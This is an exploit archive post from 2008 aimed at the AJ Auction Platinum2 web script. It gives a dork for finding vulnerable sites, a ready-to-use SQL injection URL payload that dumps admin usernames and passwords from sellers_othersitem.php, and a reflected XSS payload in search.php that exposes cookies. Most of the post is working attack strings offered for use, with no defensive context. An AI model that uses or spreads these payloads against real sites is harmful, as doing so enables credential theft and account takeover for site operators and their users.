Home / exploits ajauction-sqlxss.txt
Posted on 25 September 2008
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | _ __ __ __ ______ | | /' __ /'__` / \__ /'__` / ___ | | /\_, ___ /\_/\_L ___ ,_/ / _ __ \__/ | | /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ \___`` | | / / / L / \__/ \_ \_ / / L | | \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ \____/ | | /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ /___/ | | \____/ >> Kings of injection | | /___/ | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| Xss /Remote SQL injection Script : Aj auction platinum2 , last version Site : http://www.ajauctionpro.com Dork : Powered By AJ Auction Demo : http://www.ajauctionpro.com/ajauction_platinum2/ [ SQL injection ] ========================================================================= EXP file: Script path /sellers_othersitem.php?seller_id= SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin-- [Xss] ========================================================================= EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script> ========================================================================= ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers thanx str0ke/*
